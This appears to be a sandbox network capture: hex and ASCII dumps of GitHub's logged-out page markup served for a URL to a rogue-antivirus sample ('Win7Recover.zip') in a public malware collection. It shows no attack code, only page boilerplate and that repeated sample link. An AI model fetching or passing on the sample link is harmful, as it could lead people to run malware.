                                                                                                                                                2022-09-29 12:52:04 UTC38020INData Raw: 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 52 65 73 6f 75 72 63 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 0a 20 20 20 20 20 20 52 65 73 6f 75 72 63 65 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c
                                                                                                                                                Data Ascii: .zip;ref_cta:Resources;&quot;}" href="https://resources.github.com/"> Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external
                                                                                                                                                2022-09-29 12:52:04 UTC38022INData Raw: 64 22 20 64 3d 22 4d 31 32 2e 37 38 20 36 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 30 36 6c 2d 34 2e 32 35 20 34 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 20 30 4c 33 2e 32 32 20 37 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 38 20 39 2e 39 34 6c 33 2e 37 32 2d 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 64 72 6f 70 64 6f 77 6e 20 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 20 72 6f 75 6e 64 65 64 20 6d 2d 30 20 70 2d 30 20 70 79 2d 32 20 70 79 2d 6c 67 2d 34 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61
                                                                                                                                                Data Ascii: d" d="M12.78 6.22a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06 0L3.22 7.28a.75.75 0 011.06-1.06L8 9.94l3.72-3.72a.75.75 0 011.06 0z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-rela
                                                                                                                                                2022-09-29 12:52:04 UTC38023INData Raw: 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 47 69 74 48 75 62 20 63 6f
                                                                                                                                                Data Ascii: quot;,&quot;label&quot;:&quot;ref_page:/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip;ref_cta:The ReadME Project;&quot;}" href="/readme"> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub co
                                                                                                                                                2022-09-29 12:52:04 UTC38024INData Raw: 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6c 6c 65 63 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71
                                                                                                                                                Data Ascii: link lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&quot;:&quot;click to go to Collections&quot;,&quot;label&quot;:&q
                                                                                                                                                2022-09-29 12:52:04 UTC38026INData Raw: 20 6d 62 2d 33 20 6d 62 2d 6d 64 2d 30 20 6d 72 2d 30 20 6d 72 2d 6d 64 2d 33 20 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 73 69 74 65 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 22 0a 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 69 74 65 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 74 79 70 65 3d 22 55 73 65 72 22 20
                                                                                                                                                Data Ascii: mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> ... '"` -->... </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="User"
                                                                                                                                                2022-09-29 12:52:04 UTC38027INData Raw: 22 66 61 6c 73 65 22 0a 20 20 20 20 20 20 20 20 20 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 69 65 4d 77 51 48 71 49 30 48 37 68 33 39 62 37 7a 66 5a 6f 47 67 67 4d 43 38 4b 66 71 62 6a 49 5a 4b 7a 79 4a 2d 5a 53 33 6d 67 45 6a 72 73 71 44 6b 61 6c 71 63 49 6d 64 64 50 50 44 30 34 65 37 38 66 38 36 37 2d 62 43 65 52 38 73 5f 64 6a 48 31 63 4d 71 77 22 20 64 61 74 61 2d 63 73 72 66 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 2d 63 73 72 66 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70
                                                                                                                                                Data Ascii: "false" autocomplete="off" > <input type="hidden" value="ieMwQHqI0H7h39b7zfZoGggMC8KfqbjIZKzyJ-ZS3mgEjrsqDkalqcImddPPD04e78f867-bCeR8s_djH1cMqw" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input typ
                                                                                                                                                2022-09-29 12:52:04 UTC38028INData Raw: 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35
                                                                                                                                                Data Ascii: " version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5
                                                                                                                                                2022-09-29 12:52:04 UTC38030INData Raw: 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67
                                                                                                                                                Data Ascii: class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg
                                                                                                                                                2022-09-29 12:52:04 UTC38031INData Raw: 69 20 63 6c 61 73 73 3d 22 64 2d 66 6c 65 78 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 35 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 20 70 2d 32 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 4e 6f 20 73 75 67 67 65 73 74 65 64 20 6a 75 6d 70 20 74 6f 20 72 65 73 75 6c 74 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 69 64 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 20 72 6f 6c 65 3d 22 6c 69 73 74 62 6f 78 22 20 63 6c 61 73 73 3d 22 70 2d 30 20 6d 2d 30 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20
                                                                                                                                                Data Ascii: i class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-fg-muted">No suggested jump to results</span> </li></ul><ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container
                                                                                                                                                2022-09-29 12:52:04 UTC38032INData Raw: 30 20 30 30 2d 2e 32 35 2e 32 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20
                                                                                                                                                Data Ascii: 0 00-.25.25z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0">
                                                                                                                                                2022-09-29 12:52:04 UTC38034INData Raw: 6f 2d 77 72 61 70 20 63 73 73 2d 74 72 75 6e 63 61 74 65 20 63 73 73 2d 74 72 75 6e 63 61 74 65 2d 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69
                                                                                                                                                Data Ascii: o-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="i
                                                                                                                                                2022-09-29 12:52:04 UTC38035INData Raw: 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30
                                                                                                                                                Data Ascii: nt="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.0
                                                                                                                                                2022-09-29 12:52:04 UTC38036INData Raw: 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61 74 61 72 20 6d 72 2d 32 20 66 6c
                                                                                                                                                Data Ascii: icon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="avatar mr-2 fl
                                                                                                                                                2022-09-29 12:52:04 UTC38038INData Raw: 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 22 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 3e 0a 20 20 3c 61 20 74 61 62 69 6e 64 65 78 3d 22 2d 31 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 64 2d 66 6c 65 78 20 66 6c 65 78 2d 61 75 74 6f 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 6f 70 65 6e 20 70 2d 32 22 20 68 72 65 66 3d 22 22 20 64 61 74 61 2d 69 74 65 6d 2d 74 79 70 65 3d 22 67 6c 6f 62 61 6c 5f 73 65 61 72 63 68 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 20 6a 73
                                                                                                                                                Data Ascii: -search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js
                                                                                                                                                2022-09-29 12:52:04 UTC38039INData Raw: 46 46 41 43 0d 0a 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20
                                                                                                                                                Data Ascii: FFACle="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75
                                                                                                                                                2022-09-29 12:52:04 UTC38040INData Raw: 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20
                                                                                                                                                Data Ascii: et"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user
                                                                                                                                                2022-09-29 12:52:04 UTC38041INData Raw: 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 72 65 70 6f 73 69 74 6f 72 79 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 61 75 74 68 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37
                                                                                                                                                Data Ascii: quot;,&quot;repository_id&quot;:null,&quot;auth_type&quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7
                                                                                                                                                2022-09-29 12:52:04 UTC38043INData Raw: 73 2d 6c 6f 67 69 6e 2d 66 69 65 6c 64 22 20 61 75 74 6f 63 61 70 69 74 61 6c 69 7a 65 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 72 72 65 63 74 3d 22 6f 66 66 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 61 75 74 6f 66 6f 63 75 73 3d 22 61 75 74 6f 66 6f 63 75 73 22 20 2f 3e 0a 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 3e 0a 20 20 20 20 20 20 50 61 73 73 77 6f 72 64 0a 20 20 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73
                                                                                                                                                Data Ascii: s-login-field" autocapitalize="off" autocorrect="off" autocomplete="username" autofocus="autofocus" /> <div class="position-relative"> <label for="password"> Password </label> <input type="password" name="password" id="password" class
                                                                                                                                                2022-09-29 12:52:04 UTC38044INData Raw: 22 20 76 61 6c 75 65 3d 22 62 66 65 31 66 64 30 39 30 39 36 65 65 32 63 38 65 64 64 62 63 35 66 33 35 64 35 35 64 64 64 66 32 63 66 31 62 36 35 62 38 36 65 38 33 39 64 64 34 33 39 64 66 31 61 34 37 65 66 39 63 38 32 32 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 0a 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 6e 61 6d 65 3d 22 63 6f 6d 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 69 67 6e 20 69 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 20 62 74 6e 2d 62 6c 6f 63 6b 20 6a 73 2d 73 69 67 6e 2d 69 6e 2d 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 64 69 73 61 62 6c 65 2d 77 69 74 68 3d 22 53 69 67 6e 69 6e 67 20 69 6e
                                                                                                                                                Data Ascii: " value="bfe1fd09096ee2c8eddbc5f35d55dddf2cf1b65b86e839dd439df1a47ef9c822" autocomplete="off" class="form-control" /> <input type="submit" name="commit" value="Sign in" class="btn btn-primary btn-block js-sign-in-button" data-disable-with="Signing in
                                                                                                                                                2022-09-29 12:52:04 UTC38045INData Raw: 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 69 67 6e 20 75 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 73 69 67 6e 20 75 70 20 66 6f 72 20 61 63 63 6f 75 6e 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 3b 72 65 66 5f 63 74 61 3a 53 